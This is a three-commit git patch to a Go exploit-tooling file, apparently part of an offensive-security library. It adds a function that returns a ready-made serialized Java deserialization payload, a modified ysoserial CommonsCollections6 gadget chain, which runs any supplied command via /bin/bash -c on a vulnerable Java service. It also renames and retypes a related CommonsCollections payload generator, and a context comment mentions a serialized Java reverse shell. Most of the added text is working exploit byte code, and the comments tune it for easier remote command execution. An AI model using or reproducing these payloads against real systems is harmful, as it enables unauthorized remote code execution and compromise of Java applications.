From 1771318fea048e3c8b8c0670322b00a68aa5bd26 Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Wed, 19 Mar 2025 21:31:19 -0600 Subject: [PATCH 1/3] Added modified Commons6 payload and corrected the return type for Commons10 --- java/javagadget.go | 132 +++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 128 insertions(+), 4 deletions(-) diff --git a/java/javagadget.go b/java/javagadget.go index ccb5796..4275204 100644 --- a/java/javagadget.go +++ b/java/javagadget.go @@ -15,10 +15,134 @@ func ErrorInvalidCommandLength(msg string) error { return fmt.Errorf("%w: %s", errInvalidCommandLength, msg) } -// the allocated space (255). -func Commons11CommandBytecode(commandStr string) ([]byte, error) { +// to this function with -c or anything of the like. +func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) { if len(commandStr) > 255 || len(commandStr) < 1 { - return []byte{}, ErrorInvalidCommandLength("command must be between 1 and 255 characters") + return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters") + } + + payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" + + "\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65" + + "\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00" + + "\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00" + + "\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e" + + "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" + + "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" + + "\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e" + + "\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79" + + "\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c" + + "\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76" + + "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" + + "\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c" + + "\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61" + + "\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72" + + "\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" + + "\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c" + + "\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70" + + "\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82" + + "\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61" + + "\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67" + + "\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d" + + "\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69" + + "\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72" + + "\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72" + + "\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d" + + "\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74" + + "\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72" + + "\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61" + + "\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec" + + "\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54" + + "\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74" + + "\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63" + + "\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63" + + "\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54" + + "\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78" + + "\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61" + + "\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e" + + "\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e" + + "\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65" + + "\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00" + + "\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f" + + "\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f" + + "\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63" + + "\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f" + + "\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54" + + "\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76" + + "\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09" + + "\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e" + + "\x00\x03\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d" + + "\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70" + + "\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73" + + "\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73" + + "\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e" + + "\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f" + + "\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38" + + "\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74" + + "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" + + "\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b" + + "\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74" + + "\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" + + "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69" + + "\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00" + + "\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" + + "\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00" + + "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" + + "\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f" + + "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00" + + "\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69" + + "\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b" + + "\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78" + + "\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d" + + "\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1b\x00" + + "\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e" + + "\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0" + + "\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70" + + "\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x13" + + "\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x02\x70\x75" + + "\x71\x00\x7e\x00\x18\x00\x00\x00\x00\x74\x00\x06" + + "\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1b" + + "\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78" + + "\x70\x76\x71\x00\x7e\x00\x18\x73\x71\x00\x7e\x00" + + "\x13\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x01\x75" + + "\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61" + + "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2" + + "\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00" + + "\x00\x00\x03\x74\x00\x09\x2f\x62\x69\x6e\x2f\x62" + + "\x61\x73\x68\x74\x00\x02\x2d\x63\x74\x00\xff" + + + // 255 characters were allocated, we just put back the unused + // length as spaces + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + + + "\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00" + + "\x7e\x00\x1b\x00\x00\x00\x01\x76\x71\x00\x7e\x00" + + "\x2c\x73\x71\x00\x7e\x00\x0f\x73\x72\x00\x11\x6a" + + "\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74" + + "\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38" + + "\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78" + + "\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" + + "\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b" + + "\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01" + + "\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69" + + "\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda" + + "\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c" + + "\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09" + + "\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f" + + "\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00" + + "\x10\x00\x00\x00\x00\x78\x78\x78" + + return payloadBytes, nil +} + +// Generated using ysoserial with CommonsCollections11. +func Commons11CommandBytecode(commandStr string) (string, error) { + if len(commandStr) > 255 || len(commandStr) < 1 { + return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters") } payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" + @@ -283,7 +407,7 @@ func Commons11CommandBytecode(commandStr string) ([]byte, error) { "\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08" + "\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78" - return []byte(payloadBytes), nil + return payloadBytes, nil } // This is a serialized java reverse shell. The gadget was generated by ysoserial From a68b24ac551f9beb1f8febed7e48521478d1fe17 Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Wed, 19 Mar 2025 21:40:01 -0600 Subject: [PATCH 2/3] Added more descriptive comment --- java/javagadget.go | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/java/javagadget.go b/java/javagadget.go index 4275204..b5bc14f 100644 --- a/java/javagadget.go +++ b/java/javagadget.go @@ -15,7 +15,12 @@ func ErrorInvalidCommandLength(msg string) error { return fmt.Errorf("%w: %s", errInvalidCommandLength, msg) } -// to this function with -c or anything of the like. +// This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell arg +// The benefit of this payload over one generated from the unmodified ysoserial is the you do not need to +// prepend it with a bash -c, and the spaces do not need to be replaced with $IFS. +// It also solves redirection issues that are present in unmodified ysoserial payloads. +// This payload will always run the provided command using bash, hence the name. +// That said you should not need, nor should you prepend a -c to commandStr parameter passed here. func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) { if len(commandStr) > 255 || len(commandStr) < 1 { return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters") From 7f190e2a53bb0bb2379eff600a2c066e8779ea1e Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Wed, 19 Mar 2025 21:56:41 -0600 Subject: [PATCH 3/3] one last correction to old func --- java/javagadget.go | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/java/javagadget.go b/java/javagadget.go index b5bc14f..36df187 100644 --- a/java/javagadget.go +++ b/java/javagadget.go @@ -144,8 +144,8 @@ func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) { return payloadBytes, nil } -// Generated using ysoserial with CommonsCollections11. -func Commons11CommandBytecode(commandStr string) (string, error) { +// Generated using ysoserial with CommonsCollections10 +func Commons10CommandBytecode(commandStr string) (string, error) { if len(commandStr) > 255 || len(commandStr) < 1 { return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters") }